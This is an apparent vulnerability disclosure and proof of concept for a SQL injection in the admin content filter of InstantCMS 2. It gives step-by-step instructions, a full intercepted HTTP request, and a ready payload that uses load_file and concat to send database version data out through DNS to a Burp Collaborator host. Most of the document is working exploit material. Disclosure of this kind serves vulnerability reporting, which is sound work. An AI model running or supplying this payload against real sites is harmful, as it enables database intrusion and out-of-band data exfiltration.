In menu Content page, there is a SQL Injection Vulnerability at Filter function. To exploit this vulnerability, attacker injection query into filter field.

Proof of Concept

1. Login with admin

2. Go to “http://127.0.0.1/icms2/admin/content/5”. In this case, the number 5 is content’s id (Can be changed to any id you have).

3. Click Filter button then click Apply button.

4. Intercept this request

POST /icms2/admin/content/5/1 HTTP/1.1
Host: 127.0.0.1
Content-Length: 2478
sec-ch-ua: "Chromium";v="113", "Not-A.Brand";v="24"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykAkt8RxbexNHSIRg
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: */*
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/icms2/admin/content/5
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: icms[62formwidgettemplateoptions]=basic_options; icms[dashboard_chart]=%7B%22c%22%3A%22users%22%2C%22s%22%3A%22reg%22%2C%22i%22%3A%227%3ADAY%22%2C%22t%22%3A%22bar%22%7D; eeb4d5874c6380489fbb8d97b5eb70d5=26u44e1dbns40301ivn5tv8q66; icms[device_type]=desktop; icms[guest_date_log]=1694455424; ICMS64FF53AAE1F09=ltpmbrm096eo0q6p1pb1bn9q4v; icms[content_tree_path]=%2F5.1; icms[introjs_widgets]=1; icms[widgets_tree_path]=%2Fcontent%2Fcontent.163; icms[menu_tree_path]=%2F1.0
Connection: close

------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="filter"

page%253d1%2526advanced_filter%253dfilters%255b0%255d%255bfield%255d%253dtitle%2526filters%255b0%255d%255bcondition%255d%253dlk%2526filters%255b0%255d%255bvalue%255d%253daaa%2526filters%255b1%255d%255bfield%255d%253ddate_pub%2526filters%255b1%255d%255bcondition%255d%253deq%2526filters%255b1%255d%255bvalue%255d%253d%2526filters%255b2%255d%255bfield%255d%253duser_id%2526filters%255b2%255d%255bcondition%255d%253deq%2526filters%255b2%255d%255bvalue%255d%253d%2526filters%255b3%255d%255bfield%255d%253dkind%2526filters%255b3%255d%255bcondition%255d%253deq%2526filters%255b3%255d%255bvalue%255d%253d%2526filters%255b4%255d%255bfield%255d%253dsource%2526filters%255b4%255d%255bcondition%255d%253dlk%2526filters%255b4%255d%255bvalue%255d%253d%2526filters%255b5%255d%255bfield%255d%253dteaser%2526filters%255b5%255d%255bcondition%255d%253dlk%2526filters%255b5%255d%255bvalue%255d%253d%2526filters%255b6%255d%255bfield%255d%253dcontent%2526filters%255b6%255d%255bcondition%255d%253dlk%2526filters%255b6%255d%255bvalue%255d%253d%2526filters%255b7%255d%255bfield%255d%253dfeatured%2526filters%255b7%255d%255bcondition%255d%253deq%2526filters%255b7%255d%255bvalue%255d%253d%2526filters%255b8%255d%255bfield%255d%253dnotice%2526filters%255b8%255d%255bcondition%255d%253dlk%2526filters%255b8%255d%255bvalue%255d%253d%2526filters%255b9%255d%255bfield%255d%253drating%2526filters%255b9%255d%255bcondition%255d%253deq%2526filters%255b9%255d%255bvalue%255d%253d%2526filters%255b10%255d%255bfield%255d%253dcomments%2526filters%255b10%255d%255bcondition%255d%253deq%2526filters%255b10%255d%255bvalue%255d%253d%2526filters%255b11%255d%255bfield%255d%253dhits_count%2526filters%255b11%255d%255bcondition%255d%253deq%2526filters%255b11%255d%255bvalue%255d%253d%2526filters%255b12%255d%255bfield%255d%253dis_deleted%2526filters%255b12%255d%255bcondition%255d%253deq%2526filters%255b12%255d%255bvalue%255d%253d%2526perpage%253d30%2526order_by%253ddate_pub%2526order_to%253ddesc
------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="visible_columns[]"

date_pub
------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="visible_columns[]"

is_approved
------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="visible_columns[]"

is_pub
------WebKitFormBoundarykAkt8RxbexNHSIRg
Content-Disposition: form-data; name="visible_columns[]"

user_id
------WebKitFormBoundarykAkt8RxbexNHSIRg--

5. Edit the above request:

Replace string title to string load_file(concat('%255c%255c%255c%255c',version(),'.3fjigaetz7srti1dj7q6uw8jaag143ss.oastify.com%255c%255chen')) at parameter filters%255b0%255d%255bfield%255d%253d. Then send it with Repeater.
For visualization, I will decode and explain this payload: filters[0][field]=(select load_file(concat('\\\\',version(),'.3fjigaetz7srti1dj7q6uw8jaag143ss.oastify.com\\hen'))) => append the version() query results to the DNS query via concat() query then send it via load_file() query

6. Get result:

At Burp Collaborator, I get the MySql version number in the DNS record: 10.4.28-MariaDB.3fjigaetz7srti1dj7q6uw8jaag143ss.oastify.com.

7. Video POC:

a. On the web interface

https://drive.google.com/file/d/1X_7ex2viGIB7AO7j_rCzp2zZdpm8KSvI/view?usp=drive_link

b. Intercerpt request and edit with payload

https://drive.google.com/file/d/1Svs6VHTJ89gaADCYtKFhnHkIHeSyD8DF/view?usp=drive_link